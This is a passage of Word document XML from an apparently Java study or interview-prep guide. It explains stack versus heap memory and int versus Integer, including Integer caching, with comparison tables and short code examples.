          <w:numId w:val="5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Memory is managed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Garbage Collector (GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606B922" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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lightly slower than stack due to complex management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF90C25" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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5F53A328"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mployee emp = new Employee(); // 'emp' reference is in stack, object is in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A72CD2" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059733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0733D47">
          <v:rect id="_x0000_i1265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F2E5B" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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35"/>
        <w:gridCol w:w="3183"/>
        <w:gridCol w:w="2713"/>
      </w:tblGrid>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="686A7DF7" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2252507F" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="0059733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4AE6E04B" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="0059733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ack Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16377404" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="0059733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eap Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="18BCA536" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586F55A1"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4234E6B7"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ores method calls, local variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0283E389"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ores objects, arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="4A97C75C" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181AC311"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 Speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55BA215E"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aster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609EE3D8"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lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="56C144A4" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC7F1DC"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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00964BCF"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read-specific</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20E6F13C"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hared among threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="54B31E48" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F73359C"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Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11DC84BB"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tic (at compile time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53DCB25B"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ynamic (at runtime)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="40C29AC7" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769D8619"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anaged By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="142E5409"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VM automatically (stack frame)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505AA6EC"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arbage Collector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00597334" w:rsidRPr="00CE4B95" w14:paraId="5A8F9622" w14:textId="77777777" w:rsidTr="00101BB3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04B8A57B"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fetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AB1035A"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hort-lived (method-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33DA58DB"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ng-lived (until GC removes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="517F889E" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059733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002CD39">
          <v:rect id="_x0000_i1266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8EF50" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">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Visual Diagram (Simple)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF1A8B3"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read Stack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1D6A8"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6F4E026"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methodB() |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47C1AF"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methodA() |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE330A"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main()    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958BFA7"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CBD4C46"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lls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4523F4C4" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="00597334">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F71ED28"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ap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3C4DD"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5C42801"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new Employee() object     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F806A"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new String("Java") object |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E1203" w14:textId="77777777" w:rsidR="00101BB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00101BB3" w:rsidP="0059733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BCB55F1" w14:textId="4628C4BE" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00051BE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4218A2C2">
          <v:rect id="_x0000_i1267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572E52E" w14:textId="77777777" w:rsidR="00E73DB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E73DB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc196307578"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain memory management below? Int and Integer?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="3C926694" w14:textId="1040FF72" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">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Great question! Let's break down </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory management for int (primitive type)</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Integer (wrapper class)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57761EEC" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0079106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7A4872E">
          <v:rect id="_x0000_i1268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D30E7" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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int vs Integer — Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A00B5" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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int (Primitive Type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A0414" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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ored in:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stack (if used as local variable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B7BC9" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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Memory footprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568A610" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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t an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, just a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB777B3" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57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memory overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77D73C" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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0F88DE09"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 a = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAAC74" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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is stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476A5EC" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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astest access and least memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C82906" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0079106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DE2D7DC">
          <v:rect id="_x0000_i1269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DAA04D" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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Integer (Wrapper Class for int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59446AA2" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ored in:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Heap (as it's an object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BBBFB0" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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olds a reference in stack, object in heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB59FED" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ore memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than int (due to object metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC50A89" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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lows nulls, useful in collections (like List&lt;Integer&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131EF87" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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33BEEC01"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ger b = new Integer(10); // discouraged, use valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70B3A9"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ger c = Integer.valueOf(10); // preferred way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9374F" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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Integer Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB8E2A" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Java caches values from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-128 to 127</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849D180"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ger x = Integer.valueOf(127);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6F917"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ger y = Integer.valueOf(127);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE95CF"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x == y); // true, same cached object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458617B8" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4448BF71"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ger m = Integer.valueOf(128);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E52479"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ger n = Integer.valueOf(128);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5084E"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m == n); // false, different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C63B6" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0079106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7FFF59">
          <v:rect id="_x0000_i1270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A32FC" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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mparis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6"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="2900"/>
      </w:tblGrid>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6D3843B8" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13629650" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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482D2758" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074B4239" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106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teger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6BF6A4E4" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228AE0D5"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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E00FF0"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imitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D04BBE"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rapper class (Object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6F09DEB7" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7020BC1B"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ored in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DD4C9F"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ck</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ED1507E"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ap (object), stack (reference)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
